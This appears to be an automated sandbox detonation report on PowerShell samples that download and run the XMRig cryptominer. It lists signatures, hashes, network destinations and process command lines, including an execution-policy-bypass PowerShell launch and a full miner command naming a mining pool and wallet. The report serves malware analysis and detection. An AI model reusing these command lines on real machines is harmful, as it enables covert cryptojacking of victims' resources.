| PID 3084 wrote to memory of 3652 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3084-0-0x00007FF835F73000-0x00007FF835F75000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_okzljvc3.hpn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3084-9-0x000001C3F2570000-0x000001C3F2592000-memory.dmp
memory/3084-10-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/3084-11-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/3084-12-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/3084-13-0x00007FF835F73000-0x00007FF835F75000-memory.dmp
memory/3084-14-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/3084-15-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/3084-16-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/3084-18-0x000001C3F2600000-0x000001C3F2612000-memory.dmp
memory/3084-19-0x000001C3F25E0000-0x000001C3F25EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3652-50-0x000001F4B3460000-0x000001F4B3480000-memory.dmp
memory/3652-51-0x000001F4B34B0000-0x000001F4B34D0000-memory.dmp
memory/3652-52-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-53-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-55-0x000001F4B4C90000-0x000001F4B4CB0000-memory.dmp
memory/3652-54-0x000001F4B4CB0000-0x000001F4B4CD0000-memory.dmp
memory/3652-56-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-57-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-59-0x000001F4B4C90000-0x000001F4B4CB0000-memory.dmp
memory/3652-58-0x000001F4B4CB0000-0x000001F4B4CD0000-memory.dmp
memory/3652-60-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-61-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-62-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-63-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-64-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-65-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-66-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-67-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-68-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-69-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-70-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-71-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-72-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-73-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-74-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-75-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-76-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-77-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-78-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-79-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-80-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-81-0x00007FF66F900000-0x00007FF670533000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
291s
Max time network
266s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2428 wrote to memory of 4444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2428 wrote to memory of 4444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.73.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
Files
memory/2428-0-0x00007FFD204C3000-0x00007FFD204C4000-memory.dmp
memory/2428-5-0x00000253EE010000-0x00000253EE032000-memory.dmp
memory/2428-6-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2428-10-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2428-9-0x00000253EE520000-0x00000253EE596000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fnteucum.2gy.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2428-26-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2428-30-0x00007FFD204C3000-0x00007FFD204C4000-memory.dmp
memory/2428-31-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2428-32-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2428-65-0x00000253EE040000-0x00000253EE04A000-memory.dmp
memory/2428-52-0x00000253EE6A0000-0x00000253EE6B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4444-94-0x000001B304390000-0x000001B3043B0000-memory.dmp
memory/4444-95-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-96-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-97-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-98-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-99-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-100-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-101-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-102-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-103-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-104-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-105-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-106-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-107-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-108-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-109-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-110-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-111-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-112-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-113-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-114-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-115-0x00007FF632310000-0x00007FF632F43000-memory.dmp
memory/4444-116-0x00007FF632310000-0x00007FF632F43000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240226-en
Max time kernel
299s
Max time network
275s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1432 wrote to memory of 4144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1432 wrote to memory of 4144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5240 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| GB | 142.250.187.234:443 | tcp | |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
memory/1432-0-0x00007FF9872D3000-0x00007FF9872D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gginggxx.sqr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1432-10-0x000002243B350000-0x000002243B372000-memory.dmp
memory/1432-11-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp
memory/1432-12-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp
memory/1432-13-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp
memory/1432-14-0x00007FF9872D3000-0x00007FF9872D5000-memory.dmp
memory/1432-15-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp
memory/1432-16-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp
memory/1432-17-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp
memory/1432-19-0x0000022454660000-0x0000022454672000-memory.dmp
memory/1432-20-0x0000022454640000-0x000002245464A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4144-51-0x000001F12F840000-0x000001F12F860000-memory.dmp
memory/4144-52-0x000001F131240000-0x000001F131260000-memory.dmp
memory/4144-53-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-54-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-56-0x000001F131280000-0x000001F1312A0000-memory.dmp
memory/4144-55-0x000001F131260000-0x000001F131280000-memory.dmp
memory/4144-57-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-58-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-60-0x000001F131280000-0x000001F1312A0000-memory.dmp
memory/4144-59-0x000001F131260000-0x000001F131280000-memory.dmp
memory/4144-61-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-62-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-63-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-64-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-65-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-66-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-67-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-68-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-69-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-70-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-71-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-72-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-73-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-74-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-75-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-76-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-77-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-78-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
memory/4144-79-0x00007FF7E79D0000-0x00007FF7E8603000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
203s
Max time network
307s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/204-2-0x00007FFA9F7A3000-0x00007FFA9F7A4000-memory.dmp
memory/204-5-0x0000029DB9D20000-0x0000029DB9D42000-memory.dmp
memory/204-6-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp
memory/204-10-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp
memory/204-9-0x0000029DB9ED0000-0x0000029DB9F46000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_10pzlg4q.tbh.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/204-25-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp
memory/204-26-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp
memory/204-128-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp
memory/204-143-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp
memory/204-144-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
297s
Max time network
262s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4632 wrote to memory of 4736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4632 wrote to memory of 4736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
